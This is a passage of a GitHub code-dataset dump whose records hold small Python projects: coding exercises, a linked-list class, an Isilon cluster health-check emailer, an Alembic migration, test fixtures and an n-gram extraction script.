{message.text}\")\n await state.finish()\n\n\n","repo_name":"vadim-romanyuk/On_OFF_sensor","sub_path":"On_OFF_sensor_bot/handlers/users/bot_registration.py","file_name":"bot_registration.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71234871286","text":"\ndef gas_stations(distance, tank_size, stations):\n visited_stations = []\n distance_travelled = 0\n while True:\n if distance_travelled + tank_size >= distance:\n break\n gas_station = max([station for station in stations if station <= distance_travelled + tank_size])\n visited_stations.append(gas_station)\n distance_travelled = gas_station\n\n return visited_stations\n\n#print(gas_stations(320, 90, [50, 80, 140, 180, 220, 290]))\n\ndef is_increasing(seq):\n\tfor i in range(len(seq) - 1):\n\t\tif seq[i + 1] <= seq[i]:\n\t\t\treturn False\n\treturn True\n\ndef is_decreasing(seq):\n\tfor i in range(len(seq) - 1):\n\t\tif seq[i + 1] >= seq[i]:\n\t\t\treturn False\n\treturn True\n\ndef increasing_or_decreasing(seq):\n\tif is_increasing(seq):\n\t\treturn \"Up!\"\n\tif is_decreasing(seq):\n\t\treturn \"Down!\"\n\treturn False\n\n#print(increasing_or_decreasing([1,2,5,9]))\n\ndef is_palindrome(num):\n\tstr_num = str(num)\n\tfront_count = 0\n\tback_count = len(str_num) - 1\n\twhile front_count <= back_count:\n\t\tif str_num[front_count] != str_num[back_count]:\n\t\t\treturn False\n\t\tfront_count += 1\n\t\tback_count -= 1\n\treturn True\n\ndef get_largest_palindrome(num):\n\twhile not is_palindrome(num):\n\t\tnum -= 1\n\treturn num\n\n#print(get_largest_palindrome(1002))\n\ndef is_digit(obj):\n digits = \"1234567890\"\n if str(obj) in digits:\n if len(str(obj)) == 1:\n return True\n return False\n\n#print(is_digit(234))\n\ndef sum_of_digits(num):\n return sum([int(digit) for digit in num])\n\ndef is_number_balanced(num):\n str_num = str(num)\n len_of_num = len(str_num)\n if len(str(num)) == 1:\n return True\n skip_middle_index = 1 if len_of_num % 2 != 0 else 0\n left_part = str_num[:len_of_num//2]\n right_part = str_num[len_of_num//2 + 
skip_middle_index:]\n\n return sum_of_digits(left_part) == sum_of_digits(right_part)\n\n#print(is_number_balanced(1230))","repo_name":"ilina322/python-101","sub_path":"week_02/week02_problems.py","file_name":"week02_problems.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22930021954","text":"import Graph as nets\nimport time\n\n\n#Menu Options.\noptions=[\n '1.Add new Node',\n '2.Add edge',\n '3.Print Network and exit',\n '4.Load Network',\n '5.Exit'\n]\n\n\n#Menu Handler\ndef printMenu():\n for option in options:\n print(option)\n return int(input())\n\n#Adds a new node by it's name and it's population\ndef addNewNode(Network):\n\n #add the node\n name = input(\"Enter node name: \")\n pop = input((\"Enter node population: \"))\n Network.addNode(pop, name)\n\n\ndef addNewEdge(Network):\n\n #Print available nodes\n if(Network.number_of_nodes()<2):\n print(\"Not enough nodes available\")\n return\n selection=-1\n i=0\n Node1=[]\n Node2=[]\n nodelist = Network.getNodes()\n while(selection<0 or selection>len(nodelist)):\n for node in nodelist:\n print(str(i+1)+\". \"+node.getName())\n i=i+1\n selection=int(input(\"Select node 1 : \"))\n if not (selection<0 or selection>len(nodelist)):\n Node1=nodelist[selection-1]\n else:\n print(\"Wrong option, chose again.\")\n nodelist.remove(Node1)\n\n selection = -1\n while (selection < 0 or selection > len(nodelist)):\n for node in nodelist:\n print(str(i + 1) + \". \" + node.getName())\n i = i + 1\n selection1 = int(input(\"Select node 1 : \"))\n if not (selection1 < 0 or selection1 > len(nodelist)):\n Node2 = nodelist[selection-1]\n else:\n print(\"Wrong option, chose again.\")\n\n #select weight\n #make connection\n\n\n\n#Boot\n\n#Create a new Network.\nnetwork=nets.PopulationNet()\n\n\n#main program.\nwhile (True):\n #Menu and options\n option=printMenu()\n if(option==1):\n addNewNode(network)\n if (option == 2):\n addNewEdge(network)\n if(option==3):\n network.draw()\n if(option==4):\n continue\n if(option==5):\n exit(0)\n\n\n\n\n\"\"\"\ndef addEdge(Network):\n print(\"list of nodes: \" + Network.getNodeNames())\n #Select neighbours to be added.\n selection=None\n while ((selection != \"n\") and (selection != \"N\")):\n print(\"Add neighbouring nodes from (n to skip): \")\n i=0\n nodes=Network.getNodes()\n selections={i in range(1,len(nodes)):nodes}\n print(selections)\n for neighbour in nodes:\n print(str(i)+neighbour.getName())\n i+=1\n selection=input()\n\n\n\n #Add neighbour and it's weight\n if((selection != \"n\") and (selection != \"N\") and (selection in nodes)):\n weight=-1\n while(weight<0 or weight>1):\n weight= input(\"Give edge weight: \")\n Network.addEdge(Node,selection,weight)\n\"\"\"","repo_name":"mchatzinikolaou/Epidemiologic_Model_Network","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11146000821","text":"import paramiko,os,re,HTML,smtplib,time,base64\ndef get():\n cd=os.getcwd()\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n s=open(\"Isilon_Cred.txt\",\"r\")\n table_content=[]\n for i in s.readlines():\n rows=[]\n i=i.strip().split(\",\")\n rows.append(\"{}\".format(i[0]))\n u=base64.b64decode(i[2])\n p=base64.b64decode(i[3])\n try:\n ssh.connect(i[1], username=u, password=p)\n stdin, stdout, stderr = ssh.exec_command(\"isi status\") 
\n opt=''.join(stdout.readlines())\n with open(\"tmp.txt\",\"w\") as f: \n f.write(opt)\n with open(\"tmp.txt\",\"r\") as f:\n isilon_issue=[]\n for line in f.readlines(): \n line=line.strip()\n line=re.sub(\"[ \\t\\n]+\",\" \",line)\n if re.search(\"Cluster Health:\",line):\n if \"OK\" not in line:\n rows.append(line)\n else:\n rows.append(\"OK\")\n except Exception as err:\n rows.append(\"
{}
\".format(err))\n table_content.append(rows)\n s.close()\n return table_content\ndef get_html(table_data):\n header=['Cluster Name',\"Health Status\"]\n htmlcode = HTML.table(table_data,header_row=header)\n with open(\"htmlfile.html\",\"w\") as f:\n f.write(htmlcode)\n fhtml=open(\"fhtml.html\",\"w\")\n with open(\"htmlfile.html\",\"r\") as f:\n fhtml.write(open(\"html_body.html\").read())\n for line in f.readlines():\n if \"\",\"\")\n fhtml.write(line)\n elif \"Cluster Health:\" in line:\n line=line.replace(\"\",\"\")\n fhtml.write(line)\n else:\n fhtml.write(line)\n fhtml.write(\"{} \".format(time.ctime()))\n fhtml.close()\n html_table=open(\"fhtml.html\",\"r\").read()\n return html_table\ndef mail(html_table_code):\n from email.mime.multipart import MIMEMultipart\n from email.mime.text import MIMEText\n From = \"fromemail@xyz.com\"\n To = [\"email1@xyz.com\",\"email2@xyz.com\"]\n Cc = [\"email3@xyz.com\",\"email4@xyz.com\"]\n # Create message container - the correct MIME type is multipart/alternative.\n msg = MIMEMultipart('alternative')\n msg['Subject'] = \"Isilon Health Status Report\"\n msg['From'] = From\n msg['To'] = \",\".join(To)\n msg['Cc'] = \",\".join(Cc)\n # Create the body of the message (a plain-text and an HTML version).\n # Record the MIME types of both parts - text/plain and text/html.\n #part1 = MIMEText(text, 'plain')\n part2 = MIMEText(html_table_code, 'html')\n # Attach parts into message container.\n msg.attach(part2)\n # Send the message via local SMTP server.\n s = smtplib.SMTP(\"smtpserver.xyz.com\",25)\n # sendmail function takes 3 arguments: sender's address, recipient's address\n # and message to send - here it is sent as one string.\n #s.sendmail(From, To + Cc, msg.as_string())\n s.sendmail(From, To + Cc , msg.as_string())\n s.quit()\ndata=get() \nhtml_table_code=get_html(data)\nmail(html_table_code)\n\n","repo_name":"atish9937/Isilon_Health_Check_Script","sub_path":"Isilon_Health_Check.py","file_name":"Isilon_Health_Check.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"34760418750","text":"import math\nfrom colorama import Fore, init\ninit()\n\nclass Activity_SLL:\n class Node:\n #Creamojs el método inicializador de la clasr nodo\n def __init__(self,value):\n self.value = value\n self.next = None\n #Creamos el méotod inicializador de la clase Single_Linked_List\n def __init__(self):\n self.head = None\n self.tail = None\n self.length = 0\n \n \n def append(self):\n while True:\n try:\n cant_node = int(input(Fore.CYAN+' Cantidad de nodos a que deseas crear: '+Fore.RESET))\n for node_item in range(cant_node):\n value = input(Fore.CYAN+' Ingresa el valor del nodo: '+Fore.RESET)\n new_node = self.Node(value)\n if self.head == None and self.tail == None:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.length +=1\n self.show_elements()\n menu_option = int(input(Fore.YELLOW+' Seleccionar una opción del menu\\n'+Fore.RESET+ Fore.RED+' 1. Añadir nodo con raiz cuadrada\\n' ' 2. Eliminar y Añadir al final elevado al cuadrado\\n' ' 3.Invertir la lista\\n Numero ingresado: '+Fore.RESET))\n while True:\n if menu_option !=1 and menu_option!=2 and menu_option !=3:\n menu_option = int(input(Fore.YELLOW+' Seleccionar una opción del menu\\n'+Fore.RESET+ Fore.RED+' 1. Añadir nodo con raiz cuadrada\\n' ' 2. 
Eliminar y Añadir al final elevado al cuadrado\\n' ' 3.Invertir la lista\\n Numero ingresado: '+Fore.RESET))\n elif menu_option==1:\n self.punto1()\n self.show_elements()\n break \n elif menu_option ==2:\n self.punto2()\n self.show_elements() \n break\n elif menu_option==3:\n self.punto3()\n self.show_elements()\n break \n \n break\n except ValueError:\n print(Fore.RED+' ERROR, se esperaba un valor númerico'+Fore.RESET) \n\n def shift(self):\n if self.length == 0:\n self.head = None\n self.tail = None\n else:\n delete_node = self.head\n self.head = delete_node.next\n delete_node.next = None\n self.length -= 1\n return print(delete_node.value)\n\n def punto1(self):\n index = int(input(Fore.CYAN+' Ingresa el indice: '+Fore.RESET))\n new_node = self.get(index - 1)\n node_sqrt = math.sqrt(int(new_node.value))\n node_n =self.Node(node_sqrt)\n if self.head == None and self.tail == None:\n self.head = node_n\n self.tail = node_n\n else:\n node_n.next = self.head\n self.head = node_n\n self.length += 1\n\n \n def punto2(self):\n index = int(input(Fore.CYAN+' Ingrese el indice: '+Fore.RESET))\n if index ==0:\n return self.shift()\n elif index == self.length-1 :\n return self.pop() \n elif not index>=self.length or index < 0:\n preview_node=self.get(index-1)\n delete_node=preview_node.next\n preview_node.next = delete_node.next\n delete_node.next =None\n self.new_node_pow(index)\n self.length-=1\n else:\n return None \n \n def new_node_pow(self, delete_node):\n index = int(input(Fore.CYAN+' Ingresa el indice: '+Fore.RESET))\n new_node = self.get(index - 1)\n node_pow = math.pow(int(new_node.value),2)\n node_n =self.Node(node_pow)\n if self.head == None and self.tail == None:\n self.head = node_n\n self.tail = node_n\n else:\n self.tail.next = node_n\n self.tail = node_n\n self.length +=1\n\n def punto3(self):\n reverse_nodes = None\n current_node = self.head\n self.tail = current_node\n\n while current_node !=None:\n next = current_node.next\n current_node.next = reverse_nodes\n reverse_nodes=current_node\n current_node=next\n self.head = reverse_nodes \n #print(self.head)\n \n def show_elements(self):\n array= []\n current_node = self.head\n while current_node != None:\n #Mientras si exista un elemento en la cabeza de la lista, el valor se añade a la lista array\n array.append(current_node.value)\n current_node = current_node.next\n return print(array)\n\n def get(self, index):\n if index == self.length -1:\n return self.tail\n if index == 0:\n return self.head\n elif not(index >= self.length or index <0):\n current_node = self.head\n visit_node_count = 0\n while visit_node_count != index:\n current_node = current_node.next\n visit_node_count += 1\n return current_node\n else:\n return None\n\n ","repo_name":"JhonatanTTamayo/Estructura_Jhonatan","sub_path":"TallerLinked/Taller.py","file_name":"Taller.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10030947470","text":"\"\"\"Added a reason\n\nRevision ID: 9822df1fc63b\nRevises: 123e18112b3f\nCreate Date: 2020-10-29 13:48:31.523472\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9822df1fc63b'\ndown_revision = '123e18112b3f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('reason',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('reason_id', sa.Integer(), nullable=True),\n sa.Column('reason', sa.String(), nullable=True),\n sa.Column('posted', sa.DateTime(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('reason')\n # ### end Alembic commands ###\n","repo_name":"Josephshitandi/pomodoro","sub_path":"migrations/versions/9822df1fc63b_added_a_reason.py","file_name":"9822df1fc63b_added_a_reason.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"10580856028","text":"# blocking the entrance always works with 2 walls; i.e., if 1 wall cannot block it, the answer is 2\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\nmoves = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n\ndef check(i, j):\n q = deque()\n q.append((i, j))\n visit = [[0]*M for _ in range(N)]\n visit[i][j] = 1\n\n while q:\n x, y = q.popleft()\n if x == N-1 and y == M-1:\n return True\n \n for dx, dy in moves:\n nx = x + dx\n ny = y + dy\n\n if 0 <= nx < N and 0 <= ny < M:\n if board[nx][ny] == 0 and visit[nx][ny] == 0:\n q.append((nx, ny))\n visit[nx][ny] = 1\n\n return False\n\nN, M = map(int, input().split())\nboard, walls = [], []\n \nfor i in range(N):\n row = list(map(int, input().split()))\n for j in range(M):\n if (i == 0 and j == 0) or (i == N-1 and j == M-1):\n continue\n if row[j] == 0:\n walls.append((i, j))\n board.append(row)\n\n# is the path already blocked with 0 walls?\nif not check(0, 0):\n print(0)\nelse:\n for i, j in walls:\n board[i][j] = 1\n if not check(0, 0):\n print(1)\n break\n board[i][j] = 0\n else:\n print(2)","repo_name":"97Kzone/CodeTest_practice","sub_path":"GOMGOM/I.py","file_name":"I.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"71545422327","text":"testing = False\r\n\r\nimport shared\r\n\r\ndef countBags(bags, outerBag):\r\n return sum(quantity * (countBags(bags, bag) + 1) for bag, quantity in bags[outerBag].items())\r\n\r\nif testing:\r\n text = shared.read_input(\"input_test\")\r\n #text = shared.read_input(\"input_test2\")\r\nelse:\r\n text = shared.read_input(\"input\")\r\n\r\nbags = shared.parse_rules(text)\r\n\r\nif testing:\r\n print(bags)\r\n\r\ntarget = \"shiny gold\"\r\npart2 = countBags(bags, target)\r\nprint(f\"Individual bags required inside single {target} bag: {part2}\")\r\n\r\nshared.printTimeElapsed()","repo_name":"deadthoma5/AdventOfCode2020","sub_path":"07/7.2.py","file_name":"7.2.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"6954200718","text":"from gui.Scaleform.daapi.view.meta.ParamsMeta import ParamsMeta\nfrom CurrentVehicle import g_currentVehicle\nfrom gui.shared import events\nfrom gui.shared.utils import ItemsParameters\nfrom gui.shared.event_bus import EVENT_BUS_SCOPE\n\nclass Params(ParamsMeta):\n\n def __init__(self):\n super(Params, self).__init__()\n\n def update(self):\n data = []\n if g_currentVehicle.isPresent():\n params = ItemsParameters.g_instance.getParameters(g_currentVehicle.item.descriptor)\n if params is not None:\n for p in params:\n data.append({'text': p[0],\n 'param': p[1],\n 'selected': False})\n\n self.as_setValuesS(data)\n return\n\n def _populate(self):\n super(Params, self)._populate()\n self.addListener(events.LobbySimpleEvent.HIGHLIGHT_TANK_PARAMS, self.__onHighlightParams, EVENT_BUS_SCOPE.LOBBY)\n self.update()\n\n def __onHighlightParams(self, event):\n self.as_highlightParamsS(event.ctx.get('type', 'empty'))\n\n def _dispose(self):\n self.removeListener(events.LobbySimpleEvent.HIGHLIGHT_TANK_PARAMS, self.__onHighlightParams, EVENT_BUS_SCOPE.LOBBY)\n super(Params, self)._dispose()\n","repo_name":"Omegaice/WOTDecompiled","sub_path":"res/scripts/client/gui/scaleform/daapi/view/lobby/hangar/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"}
+{"seq_id":"13188485542","text":"# Good morning! Here's your coding interview problem for today.\n\n# This problem was asked by Stripe.\n\n# Given an array of integers, find the first missing positive integer in linear time and constant space. \n# In other words, find the lowest positive integer that does not exist in the array. The array can contain duplicates and negative numbers as well.\n\n# For example, the input [3, 4, -1, 1] should give 2. The input [1, 2, 0] should give 3.\n\n# You can modify the input array in-place.\n\ndef solve(arr):\n # NOTE: sorting makes this O(n log n); the prompt asks for linear time and constant space\n arr.sort()\n intresult = arr[0]\n for x in range(len(arr)):\n if(arr[x]-intresult<=1 or arr[x] <=0):\n intresult= arr[x]\n else:\n while(intresult!=arr[x]):\n intresult+=1\n if(intresult>0 and intresult!=arr[x]):\n return intresult\n\n\n return intresult+1\n\n\ndef main():\n arr1 = [3, 4, -1, 1]\n arr2 = [1, 2, 0]\n arr3 = [-3,-1, 1, 3] ##should return 2\n arr4 = [-3,-1, 2] ##should return 1\n print(solve(arr1))\n print(solve(arr2))\n print(solve(arr3))\n print(solve(arr4))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Joseph22Jct/Daily-Coding-Problems","sub_path":"Problem 4/problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"15096254989","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport global_list as gl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nclass BasicAnalysis(object):\n\n def basic_info(self):\n # bug fix: instance methods need self; the old data parameter was shadowed on the next line anyway\n data = pd.read_csv(gl.TEST_FOREX_RESULT_PATH + 'xauusdd_form.csv')[1:]\n print(data[:8])\n print(\"------------------------------------------------------------------\")\n print(data.describe())\n\n def show_p_change(self):\n data = pd.read_csv(gl.TEST_FOREX_RESULT_PATH + 'xauusdd_form.csv')[1:]\n plt.plot(data['fclose'])\n plt.show()\n plt.plot(data['p_change'])\n plt.show()\n\n\n# Simple test\n\nb = BasicAnalysis()\nbi = b.basic_info()\nspc = b.show_p_change()","repo_name":"pan-cai/quantist3","sub_path":"quantist3/ok/technical/basic_analysis.py","file_name":"basic_analysis.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"463260311","text":"import random\nimport uuid\nfrom datetime import datetime\n\nimport pytest_asyncio\n\nfrom polar.enums import Platforms\nfrom polar.integrations.github.service import (\n github_organization,\n github_repository,\n)\nfrom polar.models.issue import Issue\nfrom polar.models.organization import Organization\nfrom polar.models.pledge import Pledge\nfrom polar.models.pull_request import PullRequest\nfrom polar.models.repository import Repository\nfrom 
polar.models.user import User\nfrom polar.organization.schemas import OrganizationCreate\nfrom polar.pledge.schemas import PledgeState\nfrom polar.postgres import AsyncSession\nfrom polar.repository.schemas import RepositoryCreate\n\n\n@pytest_asyncio.fixture\nasync def predictable_organization(session: AsyncSession) -> Organization:\n create_schema = OrganizationCreate(\n platform=Platforms.github,\n name=\"testorg\",\n external_id=random.randrange(5000),\n avatar_url=\"http://avatar_url\",\n is_personal=False,\n installation_id=random.randrange(5000),\n installation_created_at=datetime.now(),\n installation_updated_at=datetime.now(),\n installation_suspended_at=None,\n )\n\n org = await github_organization.create(session, create_schema)\n session.add(org)\n await session.commit()\n return org\n\n\n@pytest_asyncio.fixture\nasync def predictable_pledging_organization(session: AsyncSession) -> Organization:\n create_schema = OrganizationCreate(\n platform=Platforms.github,\n name=\"pledging_org\",\n external_id=random.randrange(5000),\n avatar_url=\"http://avatar_url\",\n is_personal=False,\n installation_id=random.randrange(5000),\n installation_created_at=datetime.now(),\n installation_updated_at=datetime.now(),\n installation_suspended_at=None,\n )\n\n org = await github_organization.create(session, create_schema)\n session.add(org)\n await session.commit()\n return org\n\n\n@pytest_asyncio.fixture\nasync def predictable_repository(\n session: AsyncSession, predictable_organization: Organization\n) -> Repository:\n create_schema = RepositoryCreate(\n platform=Platforms.github,\n name=\"testrepo\",\n organization_id=predictable_organization.id,\n external_id=random.randrange(5000),\n is_private=True,\n )\n repo = await github_repository.create(session, create_schema)\n session.add(repo)\n await session.commit()\n return repo\n\n\n@pytest_asyncio.fixture\nasync def predictable_issue(\n session: AsyncSession,\n predictable_organization: Organization,\n predictable_repository: Repository,\n) -> Issue:\n issue = await Issue.create(\n session=session,\n id=uuid.uuid4(),\n organization_id=predictable_organization.id,\n repository_id=predictable_repository.id,\n title=\"issue title\",\n number=123,\n platform=Platforms.github,\n external_id=random.randrange(5000),\n state=\"open\",\n issue_created_at=datetime.now(),\n issue_modified_at=datetime.now(),\n )\n\n await session.commit()\n return issue\n\n\n@pytest_asyncio.fixture\nasync def predictable_user(\n session: AsyncSession,\n) -> User:\n user = await User.create(\n session=session,\n id=uuid.uuid4(),\n username=\"foobar\",\n email=\"test@example.com\",\n )\n\n await session.commit()\n return user\n\n\n@pytest_asyncio.fixture\nasync def predictable_pledge(\n session: AsyncSession,\n predictable_organization: Organization,\n predictable_repository: Repository,\n predictable_issue: Issue,\n predictable_pledging_organization: Organization,\n) -> Pledge:\n pledge = await Pledge.create(\n session=session,\n id=uuid.uuid4(),\n by_organization_id=predictable_pledging_organization.id,\n issue_id=predictable_issue.id,\n repository_id=predictable_repository.id,\n organization_id=predictable_organization.id,\n amount=12345,\n fee=123,\n state=PledgeState.created,\n )\n\n await session.commit()\n return pledge\n\n\n@pytest_asyncio.fixture\nasync def predictable_pull_request(\n session: AsyncSession,\n predictable_organization: Organization,\n predictable_repository: Repository,\n) -> PullRequest:\n pr = await PullRequest.create(\n session=session,\n 
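# editor's note (added): despite the predictable_ naming, the id and external_id values below are re-randomized on every run; only the names, numbers and titles are fixed\n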
id=uuid.uuid4(),\n repository_id=predictable_repository.id,\n organization_id=predictable_organization.id,\n number=5555,\n external_id=random.randrange(5000),\n title=\"PR Title\",\n author={\"login\": \"pr_creator_login\"},\n platform=Platforms.github,\n state=\"open\",\n issue_created_at=datetime.now(),\n issue_modified_at=datetime.now(),\n )\n\n await session.commit()\n return pr\n","repo_name":"polarsource/polar","sub_path":"server/tests/fixtures/predictable_objects.py","file_name":"predictable_objects.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","stars":736,"dataset":"github-code","pt":"76"}
+{"seq_id":"43020515528","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set et ai sta sw=2 ts=2 tw=0:\n\"\"\"\nGraphical BootSetup.\n\"\"\"\nfrom __future__ import unicode_literals\n\n__copyright__ = 'Copyright 2013-2014, Salix OS'\n__license__ = 'GPL2+'\n\nimport os\nimport sys\nimport gettext\nimport gtk\nimport gtk.glade\nfrom bootsetup import *\nfrom gathergui import *\n\nclass BootSetupGtk(BootSetup):\n def run_setup(self):\n gtk.glade.bindtextdomain(self._appName, self._localeDir)\n gtk.glade.textdomain(self._appName)\n if not (self._isTest and self._useTestData) and os.getuid() != 0:\n self.error_dialog(_(\"Root privileges are required to run this program.\"), _(\"Sorry!\"))\n sys.exit(1)\n gg = GatherGui(self, self._version, self._bootloader, self._targetPartition, self._isTest, self._useTestData)\n gg.run()\n \n def info_dialog(self, message, title = None, parent = None):\n dialog = gtk.MessageDialog(parent = parent, type = gtk.MESSAGE_INFO, buttons = gtk.BUTTONS_OK, flags = gtk.DIALOG_MODAL)\n if title:\n msg = \"{0}\\n\\n{1}\".format(unicode(title), unicode(message))\n else:\n msg = message\n dialog.set_markup(msg)\n result_info = dialog.run()\n dialog.destroy()\n return result_info\n\n def error_dialog(self, message, title = None, parent = None):\n dialog = gtk.MessageDialog(parent = parent, type = gtk.MESSAGE_ERROR, buttons = gtk.BUTTONS_CLOSE, flags = gtk.DIALOG_MODAL)\n if title:\n msg = \"{0}\\n\\n{1}\".format(unicode(title), unicode(message))\n else:\n msg = message\n dialog.set_markup(msg)\n result_error = dialog.run()\n dialog.destroy()\n return result_error\n","repo_name":"mimosa67/bootsetup","sub_path":"src/lib/bootsetup_gtk.py","file_name":"bootsetup_gtk.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
+{"seq_id":"35970700719","text":"\"\"\"Create logger which can be passed to other modules.\"\"\"\n\nimport logging.config\nfrom pathlib import Path\n\nimport yaml\nfrom colorlog import ColoredFormatter\n\n\ndef logger_setup(json_data: dict):\n \"\"\"Create logger which can be passed to other modules.\"\"\"\n \n # Create the 'Log' folder if it doesn't exist\n # bug fix: joinpath must be called on a Path instance, not on the Path class with plain strings\n log_folder = Path(json_data.get(\"work_dir\")).joinpath(json_data.get(\"log_path\"))\n log_folder.mkdir(exist_ok=True)\n\n # Read in logger config yaml file with safe load\n with open(json_data.pop(\"logger_path\"), 'r') as f:\n config_dict = yaml.safe_load(f)\n\n # Update logger file path to include the working directory\n log_file_path = Path(json_data.get(\"work_dir\")).joinpath(config_dict[\"handlers\"][\"file\"][\"filename\"])\n\n # Create the debugging_file.log if it doesn't exist\n if not log_file_path.exists():\n with open(log_file_path, 'w') as file:\n pass\n\n # Update logger configuration with the new file path\n 
config_dict[\"handlers\"][\"file\"][\"filename\"] = log_file_path\n\n # Set up console logging based on config_json, set False if not found\n if json_data.pop(\"logging_colors\", False):\n config_dict['handlers']['console']['formatter'] = 'colorFormatter'\n\n # Create color formatter for console output\n color_formatter = ColoredFormatter(\n config_dict[\"formatters\"]['colorFormatter']['format'],\n log_colors=config_dict[\"formatters\"]['colorFormatter']['log_colors'],\n reset=True,\n )\n\n # Update console handler with the color formatter\n config_dict['handlers']['console']['formatter'] = 'color'\n config_dict['formatters']['color'] = {\n '()': color_formatter.__class__,\n 'format': color_formatter._fmt,\n 'log_colors': color_formatter.log_colors\n }\n else:\n config_dict['handlers']['console']['formatter'] = 'consoleFormatter'\n\n # create logger\n logging.config.dictConfig(config_dict)\n logger = logging.getLogger(\"main\")\n return logger\n","repo_name":"mrstevencervantes/Python-Project-Template-Exe","sub_path":"Automation/Config/logger_module.py","file_name":"logger_module.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23725376941","text":"import pickle\nfrom os import listdir\nimport os.path\nfrom utilitarian import QuickDataFrame\n\n\"\"\" We named our list of classifier-words \"Super words\"\n The data structure is a Python dictionary of years -> dict of classifiers-> dict of words -> frequencies\n e.g. s_words[1987]['份']['日志'] is 4, meaning that in google ngrams dataset the frequency of the use of \n the classifier '份' with the context noun '日志' in the year of 1987 is 4\n\"\"\"\n\n\ndef save_classifier_nouns():\n # this super words list is not like the final super_words (i.e. 
does not have time stamps and frequency data)\n super_words = dict()\n with open('./data/gwc2016_classifiers/lemma_dictionary_tao1.txt', encoding='utf-8') as infile:\n # ChineseLemma \\t Classifier \\t FrequencyCount\n for line in infile:\n if len(line) < 2 or line[0] == '#':\n continue\n context, classifier, freq = line.split('\\t')\n if int(freq) > 1:\n if classifier not in super_words:\n super_words[classifier] = set()\n super_words[classifier].add(context)\n\n # deleting categories with less than 10 instances\n bad_cats = set()\n for cat, words in super_words.items():\n if len(words) < 10:\n bad_cats.add(cat)\n for cat in bad_cats:\n del super_words[cat]\n print(len(bad_cats), 'categories removed due to having less than 10 instances')\n super_words = {2010: super_words}\n with open('./data/super_words-chi-Luis.pkl', 'wb') as super_file:\n pickle.dump(super_words, super_file)\n\n\ndef save_time_stamps():\n with open('./data/super_words-chi-Luis.pkl', 'rb') as super_file:\n super_words = pickle.load(super_file)\n\n if os.path.isfile('./data/time_stamp_data_luis(w2v).pkl'):\n with open('./data/time_stamp_data_luis(w2v).pkl', 'rb') as infile:\n time_stamps = pickle.load(infile)\n else:\n # initialise time_stamps for each combination of \"classifier context\"\n time_stamps = dict()\n for decade, cats in super_words.items():\n for cat, words in cats.items():\n for word in words:\n query = cat + word\n time_stamps[query] = []\n\n if os.path.isfile('./data/checked_files(w2v).pkl'):\n with open('./data/checked_files(w2v).pkl', 'rb') as infile:\n checked_files = pickle.load(infile)\n else:\n checked_files = set()\n\n ngram_path = '/media/disk_ngram2/ngram_classifier_data/' # path to the folder of google chinese ngrams\n file_names_list = listdir(ngram_path)\n i = 0\n for file_name in file_names_list:\n i += 1\n if file_name in checked_files:\n continue\n print(i, 'of', len(file_names_list))\n with open(ngram_path + file_name, 'r', encoding='utf-8') as infile:\n for line in infile:\n try:\n ngram = line.partition('\\t')[0]\n ngram_ref = ngram.replace(' ', '')\n ngram_ref = ngram_ref.replace('_NOUN', '')\n if ngram_ref in time_stamps:\n time_stamps[ngram_ref].append(line.strip())\n except Exception as e:\n print(e, line)\n checked_files.add(file_name)\n if i % 50 == 0:\n with open('./data/checked_files(w2v).pkl', 'wb') as outfile:\n pickle.dump(checked_files, outfile)\n with open('./data/time_stamp_data_luis(w2v).pkl', 'wb') as outfile:\n pickle.dump(time_stamps, outfile)\n\n with open('./data/checked_files(w2v).pkl', 'wb') as outfile:\n pickle.dump(checked_files, outfile)\n # save 